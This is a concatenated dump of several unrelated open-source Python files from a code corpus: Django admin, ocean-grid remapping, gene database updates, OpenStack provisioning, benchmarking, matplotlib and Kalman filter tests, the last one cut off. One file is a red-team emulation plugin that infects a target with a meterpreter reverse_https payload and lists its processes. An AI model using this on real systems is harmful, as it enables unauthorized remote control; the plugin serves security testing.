] | 1
|
2020-06-13T11:23:18.000Z
|
2020-06-13T11:23:18.000Z
|
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
] | null | null | null |
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Author,Book,Exercise,Chapter,Solution,UserLibrary
# Register your models here.
admin.site.register(Author)
admin.site.register(Book)
admin.site.register(Exercise)
admin.site.register(Chapter)
admin.site.register(Solution)
admin.site.register(UserLibrary)
| 28.090909
| 69
| 0.828479
|
766314ef344c0310f3037878c7bfa983b2c55a4f
| 1,434
|
py
|
Python
|
examples/Beaufort/make_weight_files.py
|
bilgetutak/pyroms
|
3b0550f26f4ac181b7812e14a7167cd1ca0797f0
|
[
"BSD-3-Clause"
] | 75
|
2016-04-05T07:15:57.000Z
|
2022-03-04T22:49:54.000Z
|
examples/Beaufort/make_weight_files.py
|
hadfieldnz/pyroms-mgh
|
cd0fe39075825f97a7caf64e2c4c5a19f23302fd
|
[
"BSD-3-Clause"
] | 27
|
2017-02-26T04:27:49.000Z
|
2021-12-01T17:26:56.000Z
|
examples/Beaufort/make_weight_files.py
|
hadfieldnz/pyroms-mgh
|
cd0fe39075825f97a7caf64e2c4c5a19f23302fd
|
[
"BSD-3-Clause"
] | 56
|
2016-05-11T06:19:14.000Z
|
2022-03-22T19:04:17.000Z
|
import pyroms
# Part of Arctic2 grid containing the Beaufort
irange=(370,580)
jrange=(460,580)
#irange=None
#jrange=None
srcgrd = pyroms.grid.get_ROMS_grid('ARCTIC2')
dstgrd = pyroms.grid.get_ROMS_grid('BEAUFORT2')
pyroms.remapping.make_remap_grid_file(srcgrd,irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(srcgrd,Cpos='u',irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(srcgrd,Cpos='v',irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(dstgrd)
pyroms.remapping.make_remap_grid_file(dstgrd,Cpos='u')
pyroms.remapping.make_remap_grid_file(dstgrd,Cpos='v')
type = ['rho','u','v']
for typ in type:
for tip in type:
grid1_file = 'remap_grid_ARCTIC2_'+str(typ)+'.nc'
grid2_file = 'remap_grid_BEAUFORT2_'+str(tip)+'.nc'
interp_file1 = 'remap_weights_ARCTIC2_to_BEAUFORT2_bilinear_'+str(typ)+'_to_'+str(tip)+'.nc'
interp_file2 = 'remap_weights_BEAUFORT2_to_ARCTIC2_bilinear_'+str(tip)+'_to_'+str(typ)+'.nc'
map1_name = 'ARCTIC2 to BEAUFORT Bilinear Mapping'
map2_name = 'BEAUFORT to ARCTIC2 Bilinear Mapping'
num_maps = 1
map_method = 'bilinear'
print("Making "+str(interp_file1)+"...")
pyroms.remapping.compute_remap_weights(grid1_file,grid2_file,\
interp_file1,interp_file2,map1_name,\
map2_name,num_maps,map_method)
| 37.736842
| 100
| 0.707113
|
4d5a0373a51dc03d4d4750f3a61d0b2d89cf869d
| 3,471
|
py
|
Python
|
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
update/genes.py
Build a file with genes that are based on hgnc format.
Parses ftp://ftp.ebi.ac.uk/pub/databases/genenames/new/tsv/hgnc_complete_set.txt,
ftp.broadinstitute.org/pub/ExAC_release/release0.3/functional_gene_constraint/
and a biomart dump from ensembl with
'Gene ID' 'Chromosome' 'Gene Start' 'Gene End' 'HGNC symbol'
The hgnc file will determine which genes that are added and most of the meta information.
The ensembl gene file will add coordinates and the exac file will add pLi scores.
Created by Måns Magnusson on 2015-01-14.
Copyright (c) 2015 __MoonsoInc__. All rights reserved.
"""
import logging
import click
from flask.cli import with_appcontext, current_app
from pprint import pprint as pp
from scout.load import load_hgnc_genes, load_transcripts, load_exons
from scout.server.extensions import store
from scout.utils.link import link_genes
from scout.utils.handle import get_file_handle
from scout.utils.scout_requests import (
fetch_mim_files,
fetch_hpo_genes,
fetch_hgnc,
fetch_ensembl_genes,
fetch_exac_constraint,
fetch_ensembl_transcripts,
)
LOG = logging.getLogger(__name__)
@click.command("genes", short_help="Update all genes")
@click.option(
"--build",
type=click.Choice(["37", "38"]),
help="What genome build should be used. If no choice update 37 and 38.",
)
@click.option("--api-key", help="Specify the api key")
@with_appcontext
def genes(build, api_key):
"""
Load the hgnc aliases to the mongo database.
"""
LOG.info("Running scout update genes")
adapter = store
# Fetch the omim information
api_key = api_key or current_app.config.get("OMIM_API_KEY")
mim_files = {}
if not api_key:
LOG.warning(
"No omim api key provided, Please not that some information will be missing"
)
else:
try:
mim_files = fetch_mim_files(
api_key, mim2genes=True, morbidmap=True, genemap2=True
)
except Exception as err:
LOG.warning(err)
raise click.Abort()
LOG.warning("Dropping all gene information")
adapter.drop_genes(build)
LOG.info("Genes dropped")
LOG.warning("Dropping all transcript information")
adapter.drop_transcripts(build)
LOG.info("transcripts dropped")
hpo_genes = fetch_hpo_genes()
if build:
builds = [build]
else:
builds = ["37", "38"]
hgnc_lines = fetch_hgnc()
exac_lines = fetch_exac_constraint()
for build in builds:
ensembl_genes = fetch_ensembl_genes(build=build)
# load the genes
hgnc_genes = load_hgnc_genes(
adapter=adapter,
ensembl_lines=ensembl_genes,
hgnc_lines=hgnc_lines,
exac_lines=exac_lines,
mim2gene_lines=mim_files.get("mim2genes"),
genemap_lines=mim_files.get("genemap2"),
hpo_lines=hpo_genes,
build=build,
)
ensembl_genes = {}
for gene_obj in hgnc_genes:
ensembl_id = gene_obj["ensembl_id"]
ensembl_genes[ensembl_id] = gene_obj
# Fetch the transcripts from ensembl
ensembl_transcripts = fetch_ensembl_transcripts(build=build)
transcripts = load_transcripts(
adapter, ensembl_transcripts, build, ensembl_genes
)
adapter.update_indexes()
LOG.info("Genes, transcripts and Exons loaded")
| 28.925
| 89
| 0.680496
|
40da094b36ee23297d997825fc9cf022b98b0862
| 10,013
|
py
|
Python
|
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
"""
Installs and configures neutron
"""
import logging
from packstack.installer import validators
from packstack.modules.common import is_all_in_one
from packstack.modules.ospluginutils import (appendManifestFile,
getManifestTemplate)
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-Provision"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Provisioning OpenStack resources for demo usage and testing")
def process_provision(param, process_args=None):
return param if is_all_in_one(controller.CONF) else 'n'
conf_params = {
"PROVISION_INIT" : [
{"CMD_OPTION" : "provision-demo",
"USAGE" : ("Whether to provision for demo usage and testing. Note "
"that provisioning is only supported for all-in-one "
"installations."),
"PROMPT" : "Would you like to provision for demo usage and testing?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"PROCESSORS" : [process_provision],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_DEMO",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "provision-tempest",
"USAGE" : ("Whether to configure tempest for testing. Note "
"that provisioning is only supported for all-in-one "
"installations."),
"PROMPT" : "Would you like to configure Tempest (OpenStack test suite)?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"PROCESSORS" : [process_provision],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"PROVISION_DEMO" : [
{"CMD_OPTION" : "provision-demo-floatrange",
"USAGE" : "The CIDR network address for the floating IP subnet",
"PROMPT" : "Enter the network address for the floating IP subnet:",
"OPTION_LIST" : False,
"VALIDATORS" : False,
"DEFAULT_VALUE" : "172.24.4.224/28",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_DEMO_FLOATRANGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"TEMPEST_GIT_REFS" : [
{"CMD_OPTION" : "provision-tempest-repo-uri",
"USAGE" : "The uri of the tempest git repository to use",
"PROMPT" : "What is the uri of the Tempest git repository?",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "https://github.com/openstack/tempest.git",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST_REPO_URI",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "provision-tempest-repo-revision",
"USAGE" : "The revision of the tempest git repository to use",
"PROMPT" : "What revision, branch, or tag of the Tempest git repository should be used?",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "stable/havana",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST_REPO_REVISION",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"PROVISION_ALL_IN_ONE_OVS_BRIDGE" : [
{"CMD_OPTION" : "provision-all-in-one-ovs-bridge",
"USAGE" : "Whether to configure the ovs external bridge in an all-in-one deployment",
"PROMPT" : "Would you like to configure the external ovs bridge?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
}
def allow_provisioning(config):
# Provisioning is currently supported only for all-in-one (due
# to a limitation with how the custom types for OpenStack
# resources are implemented).
return is_all_in_one(config)
def check_provisioning_demo(config):
return (allow_provisioning(config) and
(config.get('CONFIG_PROVISION_DEMO', 'n') == 'y' or
config.get('CONFIG_PROVISION_TEMPEST', 'n') == 'y'))
def check_provisioning_tempest(config):
return allow_provisioning(config) and \
config.get('CONFIG_PROVISION_TEMPEST', 'n') == 'y'
def allow_all_in_one_ovs_bridge(config):
return allow_provisioning(config) and \
config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch'
conf_groups = [
{ "GROUP_NAME" : "PROVISION_INIT",
"DESCRIPTION" : "Provisioning demo config",
"PRE_CONDITION" : lambda x: 'yes',
"PRE_CONDITION_MATCH" : "yes",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "PROVISION_DEMO",
"DESCRIPTION" : "Provisioning demo config",
"PRE_CONDITION" : check_provisioning_demo,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "TEMPEST_GIT_REFS",
"DESCRIPTION" : "Optional tempest git uri and branch",
"PRE_CONDITION" : check_provisioning_tempest,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "PROVISION_ALL_IN_ONE_OVS_BRIDGE",
"DESCRIPTION" : "Provisioning all-in-one ovs bridge config",
"PRE_CONDITION" : allow_all_in_one_ovs_bridge,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
]
for group in conf_groups:
paramList = conf_params[group["GROUP_NAME"]]
controller.addGroup(group, paramList)
# Due to group checking some parameters might not be initialized, but
# provision.pp needs them all. So we will initialize them with default
# values
params = [
controller.getParamByName(x)
for x in ['CONFIG_PROVISION_TEMPEST_REPO_URI',
'CONFIG_PROVISION_TEMPEST_REPO_REVISION',
'CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE']
]
for param in params:
value = controller.CONF.get(param.CONF_NAME, param.DEFAULT_VALUE)
controller.CONF[param.CONF_NAME] = value
def marshall_conf_bool(conf, key):
if conf[key] == 'y':
conf[key] = 'true'
else:
conf[key] = 'false'
def initSequences(controller):
provisioning_required = (
controller.CONF['CONFIG_PROVISION_DEMO'] == 'y'
or
controller.CONF['CONFIG_PROVISION_TEMPEST'] == 'y'
)
if not provisioning_required:
return
marshall_conf_bool(controller.CONF, 'CONFIG_PROVISION_TEMPEST')
marshall_conf_bool(controller.CONF,
'CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE')
provision_steps = [
{
'title': 'Adding Provisioning manifest entries',
'functions': [create_manifest],
}
]
controller.addSequence("Provisioning for Demo and Testing Usage",
[], [], provision_steps)
def create_manifest(config):
# Using the neutron or nova api servers as the provisioning target
# will suffice for the all-in-one case.
if config['CONFIG_NEUTRON_INSTALL'] == "y":
host = config['CONFIG_NEUTRON_SERVER_HOST']
else:
host = config['CONFIG_NOVA_API_HOST']
# The provisioning template requires the name of the external
# bridge but the value will be missing if neutron isn't
# configured to be installed.
config['CONFIG_NEUTRON_L3_EXT_BRIDGE'] = 'br-ex'
# Set template-specific parameter to configure whether neutron is
# available. The value needs to be true/false rather than the y/n.
# provided by CONFIG_NEUTRON_INSTALL.
config['PROVISION_NEUTRON_AVAILABLE'] = config['CONFIG_NEUTRON_INSTALL']
marshall_conf_bool(config, 'PROVISION_NEUTRON_AVAILABLE')
manifest_file = '%s_provision.pp' % host
manifest_data = getManifestTemplate("provision.pp")
appendManifestFile(manifest_file, manifest_data)
| 42.790598
| 111
| 0.563567
|
f1bbf6934e44b865f274367a98ab235cd9bc9e28
| 1,257
|
py
|
Python
|
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | 7
|
2021-11-30T19:54:29.000Z
|
2022-03-05T23:15:23.000Z
|
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | null | null | null |
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | 2
|
2021-11-30T11:16:27.000Z
|
2022-02-02T13:36:01.000Z
|
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitPsPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_ps"
description = "Process discovery via metasploit"
ttp = "T1057"
references = ["https://attack.mitre.org/techniques/T1057/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.ps_process_discovery(target)
return res
| 28.568182
| 126
| 0.595068
|
44593cf2b5414b5e7aac9e4d30f5b628b196a5f1
| 633
|
py
|
Python
|
install.py
|
zjw0358/ipython-auto-import
|
4249b3a9d18a5e27ec714b9a5e71a32ab63d1938
|
[
"MIT"
] | 55
|
2016-07-24T11:18:01.000Z
|
2018-10-02T12:34:04.000Z
|
install.py
|
zjw0358/ipython-auto-import
|
4249b3a9d18a5e27ec714b9a5e71a32ab63d1938
|
[
"MIT"
] | 9
|
2016-03-28T15:08:33.000Z
|
2016-07-28T20:27:02.000Z
|
install.py
|
AaronC81/ipython-auto-import
|
5ce4f51fe0ad559ba4481410168a27b0580337d0
|
[
"MIT"
] | 2
|
2016-07-23T05:50:05.000Z
|
2018-10-02T12:34:06.000Z
|
import shutil
import os
u = os.path.expanduser("~")
assert u != "~"
extensions_path = os.path.join(u, ".ipython", "extensions",
"import_wrapper.py")
config_path = os.path.join(u, ".ipython", "profile_default",
"ipython_config.py")
shutil.copyfile("import_wrapper.py", extensions_path)
with open(config_path, "a") as f:
f.write("\nc.InteractiveShellApp.exec_lines.append(\"%load_ext import_wra"
"pper\")")
print("Installation complete.")
try:
import colorama
except ImportError:
print("NOTE: Install 'colorama' for best results: 'pip install colorama'")
| 28.772727
| 78
| 0.649289
|
b821d581178cf8796896bfe24bb9e94e848b029b
| 6,890
|
py
|
Python
|
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
# BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import errno
import logging
import os
import signal
import subprocess
import sys
import threading
sys.dont_write_bytecode = True # prevent creation of .pyc files
from benchexec import __version__
from benchexec import util
def add_basic_executor_options(argument_parser):
"""Add some basic options for an executor to an argparse argument_parser."""
argument_parser.add_argument(
"args",
nargs="+",
metavar="ARG",
help='command line to run (prefix with "--" to ensure all arguments are treated correctly)',
)
argument_parser.add_argument(
"--version", action="version", version="%(prog)s " + __version__
)
verbosity = argument_parser.add_mutually_exclusive_group()
verbosity.add_argument("--debug", action="store_true", help="show debug output")
verbosity.add_argument("--quiet", action="store_true", help="show only warnings")
def handle_basic_executor_options(options, parser):
"""Handle the options specified by add_basic_executor_options()."""
# setup logging
logLevel = logging.INFO
if options.debug:
logLevel = logging.DEBUG
elif options.quiet:
logLevel = logging.WARNING
util.setup_logging(level=logLevel)
class BaseExecutor(object):
"""Class for starting and handling processes."""
def __init__(self):
self.PROCESS_KILLED = False
# killing process is triggered asynchronously, need a lock for synchronization
self.SUB_PROCESS_PIDS_LOCK = threading.Lock()
self.SUB_PROCESS_PIDS = set()
def _get_result_files_base(self, temp_dir):
"""Given the temp directory that is created for each run, return the path to the directory
where files created by the tool are stored."""
return temp_dir
def _start_execution(
self,
args,
stdin,
stdout,
stderr,
env,
cwd,
temp_dir,
cgroups,
parent_setup_fn,
child_setup_fn,
parent_cleanup_fn,
):
"""Actually start the tool and the measurements.
@param parent_setup_fn a function without parameters that is called in the parent process
immediately before the tool is started
@param child_setup_fn a function without parameters that is called in the child process
before the tool is started
@param parent_cleanup_fn a function that is called in the parent process
immediately after the tool terminated, with three parameters:
the result of parent_setup_fn, the result of the executed process as ProcessExitCode,
and the base path for looking up files as parameter values
@return: a tuple of PID of process and a blocking function, which waits for the process
and a triple of the exit code and the resource usage of the process
and the result of parent_cleanup_fn (do not use os.wait)
"""
def pre_subprocess():
# Do some other setup the caller wants.
child_setup_fn()
# put us into the cgroup(s)
pid = os.getpid()
cgroups.add_task(pid)
# Set HOME and TMPDIR to fresh directories.
tmp_dir = os.path.join(temp_dir, "tmp")
home_dir = os.path.join(temp_dir, "home")
os.mkdir(tmp_dir)
os.mkdir(home_dir)
env["HOME"] = home_dir
env["TMPDIR"] = tmp_dir
env["TMP"] = tmp_dir
env["TEMPDIR"] = tmp_dir
env["TEMP"] = tmp_dir
logging.debug("Executing run with $HOME and $TMPDIR below %s.", temp_dir)
parent_setup = parent_setup_fn()
p = subprocess.Popen(
args,
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
cwd=cwd,
close_fds=True,
preexec_fn=pre_subprocess,
)
def wait_and_get_result():
exitcode, ru_child = self._wait_for_process(p.pid, args[0])
parent_cleanup = parent_cleanup_fn(
parent_setup, util.ProcessExitCode.from_raw(exitcode), ""
)
return exitcode, ru_child, parent_cleanup
return p.pid, wait_and_get_result
def _wait_for_process(self, pid, name):
"""Wait for the given process to terminate.
@return tuple of exit code and resource usage
"""
try:
logging.debug("Waiting for process %s with pid %s", name, pid)
unused_pid, exitcode, ru_child = os.wait4(pid, 0)
return exitcode, ru_child
except OSError as e:
if self.PROCESS_KILLED and e.errno == errno.EINTR:
# Interrupted system call seems always to happen
# if we killed the process ourselves after Ctrl+C was pressed
# We can try again to get exitcode and resource usage.
logging.debug(
"OSError %s while waiting for termination of %s (%s): %s.",
e.errno,
name,
pid,
e.strerror,
)
try:
unused_pid, exitcode, ru_child = os.wait4(pid, 0)
return exitcode, ru_child
except OSError:
pass # original error will be handled and this ignored
logging.critical(
"OSError %s while waiting for termination of %s (%s): %s.",
e.errno,
name,
pid,
e.strerror,
)
return 0, None
def stop(self):
self.PROCESS_KILLED = True
with self.SUB_PROCESS_PIDS_LOCK:
for pid in self.SUB_PROCESS_PIDS:
logging.warning("Killing process %s forcefully.", pid)
try:
util.kill_process(pid)
except EnvironmentError as e:
# May fail due to race conditions
logging.debug(e)
| 35.153061
| 100
| 0.618287
|
8b0defd5c58a703abcb0bfb4568d03dc75234874
| 2,857
|
py
|
Python
|
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2017-02-05T18:05:07.000Z
|
2017-02-05T18:05:07.000Z
|
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
"""
Demonstrate SVG filtering effects which might be used with mpl.
The pie chart drawing code is borrowed from pie_demo.py
Note that the filtering effects are only effective if your svg rederer
support it.
"""
import matplotlib
matplotlib.use("Svg")
import matplotlib.pyplot as plt
from matplotlib.patches import Shadow
# make a square figure and axes
fig1 = plt.figure(1, figsize=(6,6))
ax = fig1.add_axes([0.1, 0.1, 0.8, 0.8])
labels = 'Frogs', 'Hogs', 'Dogs', 'Logs'
fracs = [15,30,45, 10]
explode=(0, 0.05, 0, 0)
# We want to draw the shadow for each pie but we will not use "shadow"
# option as it does'n save the references to the shadow patches.
pies = ax.pie(fracs, explode=explode, labels=labels, autopct='%1.1f%%')
for w in pies[0]:
# set the id with the label.
w.set_gid(w.get_label())
# we don't want to draw the edge of the pie
w.set_ec("none")
for w in pies[0]:
# create shadow patch
s = Shadow(w, -0.01, -0.01)
s.set_gid(w.get_gid()+"_shadow")
s.set_zorder(w.get_zorder() - 0.1)
ax.add_patch(s)
# save
from StringIO import StringIO
f = StringIO()
plt.savefig(f, format="svg")
import xml.etree.cElementTree as ET
# filter definition for shadow using a gaussian blur
# and lighteneing effect.
# The lightnening filter is copied from http://www.w3.org/TR/SVG/filters.html
# I tested it with Inkscape and Firefox3. "Gaussian blur" is supported
# in both, but the lightnening effect only in the inkscape. Also note
# that, inkscape's exporting also may not support it.
filter_def = """
<defs xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'>
<filter id='dropshadow' height='1.2' width='1.2'>
<feGaussianBlur result='blur' stdDeviation='2'/>
</filter>
<filter id='MyFilter' filterUnits='objectBoundingBox' x='0' y='0' width='1' height='1'>
<feGaussianBlur in='SourceAlpha' stdDeviation='4%' result='blur'/>
<feOffset in='blur' dx='4%' dy='4%' result='offsetBlur'/>
<feSpecularLighting in='blur' surfaceScale='5' specularConstant='.75'
specularExponent='20' lighting-color='#bbbbbb' result='specOut'>
<fePointLight x='-5000%' y='-10000%' z='20000%'/>
</feSpecularLighting>
<feComposite in='specOut' in2='SourceAlpha' operator='in' result='specOut'/>
<feComposite in='SourceGraphic' in2='specOut' operator='arithmetic'
k1='0' k2='1' k3='1' k4='0'/>
</filter>
</defs>
"""
tree, xmlid = ET.XMLID(f.getvalue())
# insert the filter definition in the svg dom tree.
tree.insert(0, ET.XML(filter_def))
for i, pie_name in enumerate(labels):
pie = xmlid[pie_name]
pie.set("filter", 'url(#MyFilter)')
shadow = xmlid[pie_name + "_shadow"]
shadow.set("filter",'url(#dropshadow)')
fn = "svg_filter_pie.svg"
print "Saving '%s'" % fn
ET.ElementTree(tree).write(fn)
| 29.760417
| 91
| 0.675534
|
251dc0ad15e11e2ad3962f3532789e93b59ecc1c
| 3,852
|
py
|
Python
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
treid5/probnum
|
fabb51243d0952fbd35e542aeb5c2dc9a449ec81
|
[
"MIT"
] | 226
|
2019-11-01T09:44:09.000Z
|
2022-03-30T23:17:17.000Z
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
simeoncarstens/probnum
|
b69587b07e2fffbdcd4c850acc98bb3de97a6e0b
|
[
"MIT"
] | 590
|
2019-11-21T08:32:30.000Z
|
2022-03-31T12:37:37.000Z
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
JonathanWenger/probnum
|
1c5499883672cfa029c12045848ea04491c69e08
|
[
"MIT"
] | 39
|
2020-01-13T16:29:45.000Z
|
2022-03-28T16:16:54.000Z
|
import numpy as np
import pytest
import probnum.problems.zoo.filtsmooth as filtsmooth_zoo
from probnum import filtsmooth
# Problems
@pytest.fixture(params=[filtsmooth_zoo.car_tracking, filtsmooth_zoo.ornstein_uhlenbeck])
def setup(request, rng):
"""Filter and regression problem."""
problem = request.param
regression_problem, info = problem(rng=rng)
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
return kalman, regression_problem
def test_rmse_filt_smooth(setup):
"""Assert that smoothing beats filtering beats nothing."""
np.random.seed(12345)
kalman, regression_problem = setup
truth = regression_problem.solution
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_info_dicts(setup):
"""Assert that smoothing beats filtering beats nothing."""
np.random.seed(12345)
kalman, regression_problem = setup
posterior, info_dicts = kalman.filtsmooth(regression_problem)
assert isinstance(info_dicts, list)
assert len(posterior) == len(info_dicts)
def test_kalman_smoother_high_order_ibm(rng):
"""The highest feasible order (without damping, which we dont use) is 11.
If this test breaks, someone played with the stable square-root implementations in
discrete_transition: for instance, solve_triangular() and cho_solve() must not be
changed to inv()!
"""
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=11,
timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
truth = regression_problem.solution
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_kalman_multiple_measurement_models(rng):
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=4,
timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
truth = regression_problem.solution
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_kalman_value_error_repeating_timepoints(rng):
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=4,
